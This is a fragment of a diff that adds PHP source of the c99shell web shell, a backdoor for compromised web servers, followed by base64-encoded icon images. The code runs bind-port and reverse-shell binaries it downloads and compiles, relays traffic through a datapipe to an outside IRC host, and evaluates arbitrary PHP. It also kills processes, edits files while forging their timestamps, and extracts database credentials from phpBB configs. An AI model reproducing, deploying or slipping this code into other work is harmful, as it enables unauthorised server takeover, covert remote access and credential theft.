    ";} + else + { + //Building array + $objects = array(); + $vd = "f"; //Viewing mode + if ($vd == "f") + { + $objects["head"] = array(); + $objects["folders"] = array(); + $objects["links"] = array(); + $objects["files"] = array(); + foreach ($list as $v) + { + $o = basename($v); + $row = array(); + if ($o == ".") {$row[] = $d.$o; $row[] = "LINK";} + elseif ($o == "..") {$row[] = $d.$o; $row[] = "LINK";} + elseif (is_dir($v)) + { + if (is_link($v)) {$type = "LINK";} + else {$type = "DIR";} + $row[] = $v; + $row[] = $type; + } + elseif(is_file($v)) {$row[] = $v; $row[] = filesize($v);} + $row[] = filemtime($v); + if (!$win) + { + $ow = posix_getpwuid(fileowner($v)); + $gr = posix_getgrgid(filegroup($v)); + $row[] = ($ow["name"]?$ow["name"]:fileowner($v))."/".($gr["name"]?$gr["name"]:filegroup($v)); + } + $row[] = fileperms($v); + if (($o == ".") or ($o == "..")) {$objects["head"][] = $row;} + elseif (is_link($v)) {$objects["links"][] = $row;} + elseif (is_dir($v)) {$objects["folders"][] = $row;} + elseif (is_file($v)) {$objects["files"][] = $row;} + $i++; + } + $row = array(); + $row[] = "Name"; + $row[] = "Size"; + $row[] = "Modify"; + if (!$win) + {$row[] = "Owner/Group";} + $row[] = "Perms"; + $row[] = "Action"; + $parsesort = parsesort($sort); + $sort = $parsesort[0].$parsesort[1]; + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$parsesort[1] = "d";} + $y = ""; + $y .= "\"".($parsesort[1]"; + $row[$k] .= $y; + for($i=0;$i".$row[$i]."";} + } + $v = $parsesort[0]; + usort($objects["folders"], "tabsort"); + usort($objects["links"], "tabsort"); + usort($objects["files"], "tabsort"); + if ($parsesort[1] == "d") + { + $objects["folders"] = array_reverse($objects["folders"]); + $objects["files"] = array_reverse($objects["files"]); + } + $objects = array_merge($objects["head"],$objects["folders"],$objects["links"],$objects["files"]); + $tab = array(); + $tab["cols"] = array($row); + $tab["head"] = array(); + $tab["folders"] = array(); + $tab["links"] = array(); + $tab["files"] = array(); + $i = 0; + foreach ($objects as $a) + { + $v = $a[0]; + $o = basename($v); + $dir = dirname($v); + if ($disp_fullpath) {$disppath = $v;} + else {$disppath = $o;} + $disppath = str2mini($disppath,60); + if (in_array($v,$sess_data["cut"])) {$disppath = "".$disppath."";} + elseif (in_array($v,$sess_data["copy"])) {$disppath = "".$disppath."";} + foreach ($regxp_highlight as $r) + { + if (ereg($r[0],$o)) + { + if ((!is_numeric($r[1])) or ($r[1] > 3)) {$r[1] = 0; ob_clean(); echo "Warning! Configuration error in \$regxp_highlight[".$k."][0] - unknown command."; c99shexit();} + else + { + $r[1] = round($r[1]); + $isdir = is_dir($v); + if (($r[1] == 0) or (($r[1] == 1) and !$isdir) or (($r[1] == 2) and !$isdir)) + { + if (empty($r[2])) {$r[2] = ""; $r[3] = "";} + $disppath = $r[2].$disppath.$r[3]; + if ($r[4]) {break;} + } + } + } + } + $uo = urlencode($o); + $ud = urlencode($dir); + $uv = urlencode($v); + $row = array(); + if ($o == ".") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif ($o == "..") + { + $row[] = " ".$o.""; + $row[] = "LINK"; + } + elseif (is_dir($v)) + { + if (is_link($v)) + { + $disppath .= " => ".readlink($v); + $type = "LINK"; + $row[] = " [".$disppath."]"; + } + else + { + $type = "DIR"; + $row[] = " [".$disppath."]"; + } + $row[] = $type; + } + elseif(is_file($v)) + { + $ext = explode(".",$o); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $row[] = " ".$disppath.""; + $row[] = view_size($a[1]); + } + $row[] = date("d.m.Y H:i:s",$a[2]); + if (!$win) {$row[] = $a[3];} + $row[] = "".view_perms_color($v).""; + if ($o == ".") {$checkbox = ""; $i--;} + else {$checkbox = "";} + if (is_dir($v)) {$row[] = "\"Info\" ".$checkbox;} + else {$row[] = "\"Info\" \"Change\" \"Download\" ".$checkbox;} + if (($o == ".") or ($o == "..")) {$tab["head"][] = $row;} + elseif (is_link($v)) {$tab["links"][] = $row;} + elseif (is_dir($v)) {$tab["folders"][] = $row;} + elseif (is_file($v)) {$tab["files"][] = $row;} + $i++; + } + } + //Compiling table + $table = array_merge($tab["cols"],$tab["head"],$tab["folders"],$tab["links"],$tab["files"]); + echo "
    Listing folder (".count($tab["files"])." files and ".(count($tab["folders"])+count($tab["links"]))." folders):

    "; + foreach($table as $row) + { + echo "\r\n"; + foreach($row as $v) {echo "\r\n";} + echo "\r\n"; + } + echo "
    ".$v."

    + +    + "; + if (count(array_merge($sess_data["copy"],$sess_data["cut"])) > 0 and ($usefsbuff)) + { + echo "                   "; + } + echo " 

    "; + echo ""; + } +} +if ($act == "tools") +{ + $bndportsrcs = array( + "c99sh_bindport.pl"=>array("Using PERL","perl %path %port"), + "c99sh_bindport.c"=>array("Using C","%path %port %pass") + ); + $bcsrcs = array( + "c99sh_backconn.pl"=>array("Using PERL","perl %path %host %port"), + "c99sh_backconn.c"=>array("Using C","%path %host %port") + ); + $dpsrcs = array( + "c99sh_datapipe.pl"=>array("Using PERL","perl %path %localport %remotehost %remoteport"), + "c99sh_datapipe.c"=>array("Using C","%path %localport %remoteport %remotehost") + ); + if (!is_array($bind)) {$bind = array();} + if (!is_array($bc)) {$bc = array();} + if (!is_array($datapipe)) {$datapipe = array();} + + if (!is_numeric($bind["port"])) {$bind["port"] = $bindport_port;} + if (empty($bind["pass"])) {$bind["pass"] = $bindport_pass;} + + if (empty($bc["host"])) {$bc["host"] = getenv("REMOTE_ADDR");} + if (!is_numeric($bc["port"])) {$bc["port"] = $bc_port;} + + if (empty($datapipe["remoteaddr"])) {$datapipe["remoteaddr"] = "irc.dalnet.ru:6667";} + if (!is_numeric($datapipe["localport"])) {$datapipe["localport"] = $datapipe_localport;} + if (!empty($bindsubmit)) + { + echo "Result of binding port:
    "; + $v = $bndportsrcs[$bind["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$bind["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $w = explode(".",$bind["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bind["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%port",$bind["port"],$v[1]); + $v[1] = str_replace("%pass",$bind["pass"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$bind["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$bind["port"]."! I think you should configure your firewall.";} + else {echo "Binding... ok! Connect to ".getenv("SERVER_ADDR").":".$bind["port"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View binder's process
    ";} + } + echo "
    "; + } + } + if (!empty($bcsubmit)) + { + echo "Result of back connection:
    "; + $v = $bcsrcs[$bc["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + else + { + $w = explode(".",$bc["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($bc["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%host",$bc["host"],$v[1]); + $v[1] = str_replace("%port",$bc["port"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + echo "Now script try connect to ".htmlspecialchars($bc["host"]).":".htmlspecialchars($bc["port"])."...
    "; + } + } + } + if (!empty($dpsubmit)) + { + echo "Result of datapipe-running:
    "; + $v = $dpsrcs[$datapipe["src"]]; + if (empty($v)) {echo "Unknown file!
    ";} + elseif (fsockopen(getenv("SERVER_ADDR"),$datapipe["port"],$errno,$errstr,0.1)) {echo "Port alredy in use, select any other!
    ";} + else + { + $srcpath = $tmpdir.$datapipe["src"]; + $w = explode(".",$datapipe["src"]); + $ext = $w[count($w)-1]; + unset($w[count($w)-1]); + $srcpath = join(".",$w).".".rand(0,999).".".$ext; + $binpath = $tmpdir.join(".",$w).rand(0,999); + if ($ext == "pl") {$binpath = $srcpath;} + @unlink($srcpath); + $fp = fopen($srcpath,"ab+"); + if (!$fp) {echo "Can't write sources to \"".$srcpath."\"!
    ";} + elseif (!$data = c99getsource($datapipe["src"])) {echo "Can't download sources!";} + else + { + fwrite($fp,$data,strlen($data)); + fclose($fp); + if ($ext == "c") {$retgcc = myshellexec("gcc -o ".$binpath." ".$srcpath); @unlink($srcpath);} + list($datapipe["remotehost"],$datapipe["remoteport"]) = explode(":",$datapipe["remoteaddr"]); + $v[1] = str_replace("%path",$binpath,$v[1]); + $v[1] = str_replace("%localport",$datapipe["localport"],$v[1]); + $v[1] = str_replace("%remotehost",$datapipe["remotehost"],$v[1]); + $v[1] = str_replace("%remoteport",$datapipe["remoteport"],$v[1]); + $v[1] = str_replace("//","/",$v[1]); + $retbind = myshellexec($v[1]." > /dev/null &"); + sleep(5); + $sock = fsockopen("localhost",$datapipe["port"],$errno,$errstr,5); + if (!$sock) {echo "I can't connect to localhost:".$datapipe["localport"]."! I think you should configure your firewall.";} + else {echo "Running datapipe... ok! Connect to ".getenv("SERVER_ADDR").":".$datapipe["port"].", and you will connected to ".$datapipe["remoteaddr"]."! You should use NetCat©, run \"nc -v ".getenv("SERVER_ADDR")." ".$bind["port"]."\"!
    View datapipe process
    ";} + } + echo "
    "; + } + } + ?>Binding port:
    Port: "> Password: ">  
    +Back connection:
    HOST: "> Port: ">  
    +Click "Connect" only after open port for it. You should use NetCat©, run "nc -l -n -v -p "!

    +Datapipe:
    HOST: "> Local port: ">  
    Note: sources will be downloaded from remote server.Processes:

    "; + if (!$win) {$handler = "ps -aux".($grep?" | grep '".addslashes($grep)."'":"");} + else {$handler = "tasklist";} + $ret = myshellexec($handler); + if (!$ret) {echo "Can't execute \"".$handler."\"!";} + else + { + if (empty($processes_sort)) {$processes_sort = $sort_default;} + $parsesort = parsesort($processes_sort); + if (!is_numeric($parsesort[0])) {$parsesort[0] = 0;} + $k = $parsesort[0]; + if ($parsesort[1] != "a") {$y = "";} + else {$y = "";} + $ret = htmlspecialchars($ret); + if (!$win) + { + if ($pid) + { + if (is_null($sig)) {$sig = 9;} + echo "Sending signal ".$sig." to #".$pid."... "; + if (posix_kill($pid,$sig)) {echo "OK.";} + else {echo "ERROR.";} + } + while (ereg(" ",$ret)) {$ret = str_replace(" "," ",$ret);} + $stack = explode("\n",$ret); + $head = explode(" ",$stack[0]); + unset($stack[0]); + for($i=0;$i".$head[$i]."";} + } + $prcs = array(); + foreach ($stack as $line) + { + if (!empty($line)) + { + echo "
    "; + foreach($tab as $i=>$k) + { + echo ""; + foreach($k as $j=>$v) {if ($win and $i > 0 and $j == 2) {$v = view_size($v);} echo "";} + echo ""; + } + echo "
    ".$v."
    "; + } +} +if ($act == "eval") +{ + if (!empty($eval)) + { + echo "Result of execution this PHP-code:
    "; + $tmp = ob_get_contents(); + $olddir = realpath("."); + @chdir($d); + if ($tmp) + { + ob_clean(); + eval($eval); + $ret = ob_get_contents(); + $ret = convert_cyr_string($ret,"d","w"); + ob_clean(); + echo $tmp; + if ($eval_txt) + { + $rows = count(explode("\r\n",$ret))+1; + if ($rows < 10) {$rows = 10;} + echo "
    "; + } + else {echo $ret."
    ";} + } + else + { + if ($eval_txt) + { + echo "
    "; + } + else {echo $ret;} + } + @chdir($olddir); + } + else {echo "Execution PHP-code"; if (empty($eval_txt)) {$eval_txt = true;}} + echo "


     Display in text-area 
    "; +} +if ($act == "f") +{ + if ((!is_readable($d.$f) or is_dir($d.$f)) and $ft != "edit") + { + if (file_exists($d.$f)) {echo "
    Permision denied (".htmlspecialchars($d.$f).")!
    ";} + else {echo "
    File does not exists (".htmlspecialchars($d.$f).")!
    Create
    ";} + } + else + { + $r = @file_get_contents($d.$f); + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($ftypes as $k=>$v) {if (in_array($ext,$v)) {$rft = $k; break;}} + if (eregi("sess_(.*)",$f)) {$rft = "phpsess";} + if (empty($ft)) {$ft = $rft;} + $arr = array( + array("","info"), + array("","html"), + array("","txt"), + array("Code","code"), + array("Session","phpsess"), + array("","exe"), + array("SDB","sdb"), + array("","img"), + array("","ini"), + array("","download"), + array("","notepad"), + array("","edit") + ); + echo "Viewing file:     ".$f." (".view_size(filesize($d.$f)).")      ".view_perms_color($d.$f)."
    Select action/file-type:
    "; + foreach($arr as $t) + { + if ($t[1] == $rft) {echo " ".$t[0]."";} + elseif ($t[1] == $ft) {echo " ".$t[0]."";} + else {echo " ".$t[0]."";} + echo " (+) |"; + } + echo "
    "; + if ($ft == "info") + { + echo "Information:"; + if (!$win) + { + echo "
    Path ".$d.$f."
    Size ".view_size(filesize($d.$f))."
    MD5 ".md5_file($d.$f)."
    Owner/Group "; + $ow = posix_getpwuid(fileowner($d.$f)); + $gr = posix_getgrgid(filegroup($d.$f)); + echo ($ow["name"]?$ow["name"]:fileowner($d.$f))."/".($gr["name"]?$gr["name"]:filegroup($d.$f)); + } + echo "
    Perms".view_perms_color($d.$f)."
    Create time ".date("d/m/Y H:i:s",filectime($d.$f))."
    Access time ".date("d/m/Y H:i:s",fileatime($d.$f))."
    MODIFY time ".date("d/m/Y H:i:s",filemtime($d.$f))."

    "; + $fi = fopen($d.$f,"rb"); + if ($fi) + { + if ($fullhexdump) {echo "FULL HEXDUMP"; $str = fread($fi,filesize($d.$f));} + else {echo "HEXDUMP PREVIEW"; $str = fread($fi,$hexdump_lines*$hexdump_rows);} + $n = 0; + $a0 = "00000000
    "; + $a1 = ""; + $a2 = ""; + for ($i=0; $i";} + $a1 .= "
    "; + $a2 .= "
    "; + } + } + //if ($a1 != "") {$a0 .= sprintf("%08X",$i)."
    ";} + echo "
    ".$a0."".$a1."".$a2."

    "; + } + $encoded = ""; + if ($base64 == 1) + { + echo "Base64 Encode
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + } + elseif($base64 == 2) + { + echo "Base64 Encode + Chunk
    "; + $encoded = chunk_split(base64_encode(file_get_contents($d.$f))); + } + elseif($base64 == 3) + { + echo "Base64 Encode + Chunk + Quotes
    "; + $encoded = base64_encode(file_get_contents($d.$f)); + $encoded = substr(preg_replace("!.{1,76}!","'\\0'.\n",$encoded),0,-2); + } + elseif($base64 == 4) + { + $text = file_get_contents($d.$f); + $encoded = base64_decode($text); + echo "Base64 Decode"; + if (base64_encode($encoded) != $text) {echo " (failed)";} + echo "
    "; + } + if (!empty($encoded)) + { + echo "

    "; + } + echo "HEXDUMP: [Full] [Preview]
    Base64: +
    [Encode +[+chunk +[+chunk+quotes +[Decode +

    "; + } + elseif ($ft == "html") + { + if ($white) {@ob_clean();} + echo $r; + if ($white) {c99shexit();} + } + elseif ($ft == "txt") {echo "

    ".htmlspecialchars($r)."
    ";} + elseif ($ft == "ini") {echo "
    "; var_dump(parse_ini_file($d.$f,true)); echo "
    ";} + elseif ($ft == "phpsess") + { + echo "
    ";
    +   $v = explode("|",$r);
    +   echo $v[0]."
    "; + var_dump(unserialize($v[1])); + echo "
    "; + } + elseif ($ft == "exe") + { + $ext = explode(".",$f); + $c = count($ext)-1; + $ext = $ext[$c]; + $ext = strtolower($ext); + $rft = ""; + foreach($exeftypes as $k=>$v) + { + if (in_array($ext,$v)) {$rft = $k; break;} + } + $cmd = str_replace("%f%",$f,$rft); + echo "Execute file:

    Display in text-area
    "; + } + elseif ($ft == "sdb") {echo "
    "; var_dump(unserialize(base64_decode($r))); echo "
    ";} + elseif ($ft == "code") + { + if (ereg("php"."BB 2.(.*) auto-generated config file",$r)) + { + $arr = explode("\n",$r); + if (count($arr == 18)) + { + include($d.$f); + echo "phpBB configuration is detected in this file!
    "; + if ($dbms == "mysql4") {$dbms = "mysql";} + if ($dbms == "mysql") {echo "Connect to DB

    ";} + else {echo "But, you can't connect to forum sql-base, because db-software=\"".$dbms."\" is not supported by c99shell. Please, report us for fix.";} + echo "Parameters for manual connect:
    "; + $cfgvars = array("dbms"=>$dbms,"dbhost"=>$dbhost,"dbname"=>$dbname,"dbuser"=>$dbuser,"dbpasswd"=>$dbpasswd); + foreach ($cfgvars as $k=>$v) {echo htmlspecialchars($k)."='".htmlspecialchars($v)."'
    ";} + echo "

    "; + } + } + echo "
    "; + if (!empty($white)) {@ob_clean();} + highlight_file($d.$f); + if (!empty($white)) {c99shexit();} + echo "
    "; + } + elseif ($ft == "download") + { + @ob_clean(); + header("Content-type: application/octet-stream"); + header("Content-length: ".filesize($d.$f)); + header("Content-disposition: attachment; filename=\"".$f."\";"); + echo $r; + exit; + } + elseif ($ft == "notepad") + { + @ob_clean(); + header("Content-type: text/plain"); + header("Content-disposition: attachment; filename=\"".$f.".txt\";"); + echo($r); + exit; + } + elseif ($ft == "img") + { + $inf = getimagesize($d.$f); + if (!$white) + { + if (empty($imgsize)) {$imgsize = 20;} + $width = $inf[0]/100*$imgsize; + $height = $inf[1]/100*$imgsize; + echo "
    Size: "; + $sizes = array("100","50","20"); + foreach ($sizes as $v) + { + echo ""; + if ($imgsize != $v ) {echo $v;} + else {echo "".$v."";} + echo "   "; + } + echo "

    "; + } + else + { + @ob_clean(); + $ext = explode($f,"."); + $ext = $ext[count($ext)-1]; + header("Content-type: ".$inf["mime"]); + readfile($d.$f); + exit; + } + } + elseif ($ft == "edit") + { + if (!empty($submit)) + { + if ($filestealth) {$stat = stat($d.$f);} + $fp = fopen($d.$f,"w"); + if (!$fp) {echo "Can't write to file!";} + else + { + echo "Saved!"; + fwrite($fp,$edit_text); + fclose($fp); + if ($filestealth) {touch($d.$f,$stat[9],$stat[8]);} + $r = $edit_text; + } + } + $rows = count(explode("\r\n",$r)); + if ($rows < 10) {$rows = 10;} + if ($rows > 30) {$rows = 30;} + echo "
      
    "; + } + elseif (!empty($ft)) {echo "
    Manually selected type is incorrect. If you think, it is mistake, please send us url and dump of \$GLOBALS.
    ";} + else {echo "
    Unknown extension (".$ext."), please, select type manually.
    ";} + } +} +} +else +{ + @ob_clean(); + $images = array( +"arrow_ltr"=> +"R0lGODlhJgAWAIAAAAAAAP///yH5BAUUAAEALAAAAAAmABYAAAIvjI+py+0PF4i0gVvzuVxXDnoQ". +"SIrUZGZoerKf28KjPNPOaku5RfZ+uQsKh8RiogAAOw==", +"back"=> +"R0lGODlhFAAUAKIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDKSWWpjVysSNiYJ4CUOBJoqjniILzwuzLtYN/3zBSErf6kBW+gKRiPRghPh+EFK0mOUEqt". +"Wg0JADs=", +"buffer"=> +"R0lGODlhFAAUAKIAAAAAAP////j4+N3d3czMzLKysoaGhv///yH5BAEAAAcALAAAAAAUABQAAANo". +"eLrcribG90y4F1Amu5+NhY2kxl2CMKwrQRSGuVjp4LmwDAWqiAGFXChg+xhnRB+ptLOhai1crEmD". +"Dlwv4cEC46mi2YgJQKaxsEGDFnnGwWDTEzj9jrPRdbhuG8Cr/2INZIOEhXsbDwkAOw==", +"change"=> +"R0lGODlhFAAUAMQfAL3hj7nX+pqo1ejy/f7YAcTb+8vh+6FtH56WZtvr/RAQEZecx9Ll/PX6/v3+". +"/3eHt6q88eHu/ZkfH3yVyIuQt+72/kOm99fo/P8AZm57rkGS4Hez6pil9oep3GZmZv///yH5BAEA". +"AB8ALAAAAAAUABQAAAWf4CeOZGme6NmtLOulX+c4TVNVQ7e9qFzfg4HFonkdJA5S54cbRAoFyEOC". +"wSiUtmYkkrgwOAeA5zrqaLldBiNMIJeD266XYTgQDm5Rx8mdG+oAbSYdaH4Ga3c8JBMJaXQGBQgA". +"CHkjE4aQkQ0AlSITan+ZAQqkiiQPj1AFAaMKEKYjD39QrKwKAa8nGQK8Agu/CxTCsCMexsfIxjDL". +"zMshADs=", +"delete"=> +"R0lGODlhFAAUAOZZAPz8/NPFyNgHLs0YOvPz8/b29sacpNXV1fX19cwXOfDw8Kenp/n5+etgeunp". +"6dcGLMMpRurq6pKSktvb2+/v7+1wh3R0dPnP17iAipxyel9fX7djcscSM93d3ZGRkeEsTevd4LCw". +"sGRkZGpOU+IfQ+EQNoh6fdIcPeHh4YWFhbJQYvLy8ui+xm5ubsxccOx8kcM4UtY9WeAdQYmJifWv". +"vHx8fMnJycM3Uf3v8rRue98ONbOzs9YFK5SUlKYoP+Tk5N0oSufn57ZGWsQrR9kIL5CQkOPj42Vl". +"ZeAPNudAX9sKMPv7+15QU5ubm39/f8e5u4xiatra2ubKz8PDw+pfee9/lMK0t81rfd8AKf///wAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5". +"BAEAAFkALAAAAAAUABQAAAesgFmCg4SFhoeIhiUfIImIMlgQB46GLAlYQkaFVVhSAIZLT5cbEYI4". +"STo5MxOfhQwBA1gYChckQBk1OwiIALACLkgxJilTBI69RFhDFh4HDJRZVFgPPFBR0FkNWDdMHA8G". +"BZTaMCISVgMC4IkVWCcaPSi96OqGNFhKI04dgr0QWFcKDL3A4uOIjVZZABxQIWDBLkIEQrRoQsHQ". +"jwVFHBgiEGQFIgQasYkcSbJQIAA7", +"download"=> +"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu". +"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=", +"forward"=> +"R0lGODlhFAAUAPIAAAAAAP///93d3cDAwIaGhgQEBP///wAAACH5BAEAAAYALAAAAAAUABQAAAM8". +"aLrc/jDK2Qp9xV5WiN5G50FZaRLD6IhE66Lpt3RDbd9CQFSE4P++QW7He7UKPh0IqVw2l0RQSEqt". +"WqsJADs=", +"home"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzLKysoaGhmZmZgQEBP///wAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAkALAAAAAAUABQAAAR+MMk5TTWI6ipyMoO3cUWRgeJoCCaLoKO0mq0ZxjNSBDWS". +"krqAsLfJ7YQBl4tiRCYFSpPMdRRCoQOiL4i8CgZgk09WfWLBYZHB6UWjCequwEDHuOEVK3QtgN/j". +"VwMrBDZvgF+ChHaGeYiCBQYHCH8VBJaWdAeSl5YiW5+goBIRADs=", +"mode"=> +"R0lGODlhHQAUALMAAAAAAP///6CgpN3d3czMzIaGhmZmZl9fX////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAAdABQAAASBEMlJq70461m6/+AHZMUgnGiqniNWHHAsz3F7FUGu73xO". +"2BZcwGDoEXk/Uq4ICACeQ6fzmXTlns0ddle99b7cFvYpER55Z10Xy1lKt8wpoIsACrdaqBpYEYK/". +"dH1LRWiEe0pRTXBvVHwUd3o6eD6OHASXmJmamJUSY5+gnxujpBIRADs=", +"refresh"=> +"R0lGODlhEQAUALMAAAAAAP////Hx8erq6uPj493d3czMzLKysoaGhmZmZl9fXwQEBP///wAAAAAA". +"AAAAACH5BAEAAAwALAAAAAARABQAAAR1kMlJq0Q460xR+GAoIMvkheIYlMyJBkJ8lm6YxMKi6zWY". +"3AKCYbjo/Y4EQqFgKIYUh8EvuWQ6PwPFQJpULpunrXZLrYKx20G3oDA7093Esv19q5O/woFu9ZAJ". +"R3lufmWCVX13h3KHfWWMjGBDkpOUTTuXmJgRADs=", +"search"=> +"R0lGODlhFAAUALMAAAAAAP///+rq6t3d3czMzMDAwLKysoaGhnd3d2ZmZl9fX01NTSkpKQQEBP//". +"/wAAACH5BAEAAA4ALAAAAAAUABQAAASn0Ml5qj0z5xr6+JZGeUZpHIqRNOIRfIYiy+a6vcOpHOap". +"s5IKQccz8XgK4EGgQqWMvkrSscylhoaFVmuZLgUDAnZxEBMODSnrkhiSCZ4CGrUWMA+LLDxuSHsD". +"AkN4C3sfBX10VHaBJ4QfA4eIU4pijQcFmCVoNkFlggcMRScNSUCdJyhoDasNZ5MTDVsXBwlviRmr". +"Cbq7C6sIrqawrKwTv68iyA6rDhEAOw==", +"setup"=> +"R0lGODlhFAAUAMQAAAAAAP////j4+OPj493d3czMzMDAwLKyspaWloaGhnd3d2ZmZl9fX01NTUJC". +"QhwcHP///wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAEA". +"ABAALAAAAAAUABQAAAWVICSKikKWaDmuShCUbjzMwEoGhVvsfHEENRYOgegljkeg0PF4KBIFRMIB". +"qCaCJ4eIGQVoIVWsTfQoXMfoUfmMZrgZ2GNDPGII7gJDLYErwG1vgW8CCQtzgHiJAnaFhyt2dwQE". +"OwcMZoZ0kJKUlZeOdQKbPgedjZmhnAcJlqaIqUesmIikpEixnyJhulUMhg24aSO6YyEAOw==", +"small_dir"=> +"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA". +"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp". +"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", +"small_unk"=> +"R0lGODlhEAAQAHcAACH5BAEAAJUALAAAAAAQABAAhwAAAIep3BE9mllic3B5iVpjdMvh/MLc+y1U". +"p9Pm/GVufc7j/MzV/9Xm/EOm99bn/Njp/a7Q+tTm/LHS+eXw/t3r/Nnp/djo/Nrq/fj7/9vq/Nfo". +"/Mbe+8rh/Mng+7jW+rvY+r7Z+7XR9dDk/NHk/NLl/LTU+rnX+8zi/LbV++fx/e72/vH3/vL4/u31". +"/e31/uDu/dzr/Orz/eHu/fX6/vH4/v////v+/3ez6vf7//T5/kGS4Pv9/7XV+rHT+r/b+rza+vP4". +"/uz0/urz/u71/uvz/dTn/M/k/N3s/dvr/cjg+8Pd+8Hc+sff+8Te+/D2/rXI8rHF8brM87fJ8nmP". +"wr3N86/D8KvB8F9neEFotEBntENptENptSxUpx1IoDlfrTRcrZeeyZacxpmhzIuRtpWZxIuOuKqz". +"9ZOWwX6Is3WIu5im07rJ9J2t2Zek0m57rpqo1nKCtUVrtYir3vf6/46v4Yuu4WZvfr7P6sPS6sDQ". +"66XB6cjZ8a/K79/s/dbn/ezz/czd9mN0jKTB6ai/76W97niXz2GCwV6AwUdstXyVyGSDwnmYz4io". +"24Oi1a3B45Sy4ae944Ccz4Sj1n2GlgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA". +"AAjnACtVCkCw4JxJAQQqFBjAxo0MNGqsABQAh6CFA3nk0MHiRREVDhzsoLQwAJ0gT4ToecSHAYMz". +"aQgoDNCCSB4EAnImCiSBjUyGLobgXBTpkAA5I6pgmSkDz5cuMSz8yWlAyoCZFGb4SQKhASMBXJpM". +"uSrQEQwkGjYkQCTAy6AlUMhWklQBw4MEhgSA6XPgRxS5ii40KLFgi4BGTEKAsCKXihESCzrsgSQC". +"yIkUV+SqOYLCA4csAup86OGDkNw4BpQ4OaBFgB0TEyIUKqDwTRs4a9yMCSOmDBoyZu4sJKCgwIDj". +"yAsokBkQADs=", +"multipage"=>"R0lGODlhCgAMAJEDAP/////3mQAAAAAAACH5BAEAAAMALAAAAAAKAAwAAAIj3IR". +"pJhCODnovidAovBdMzzkixlXdlI2oZpJWEsSywLzRUAAAOw==", +"sort_asc"=> 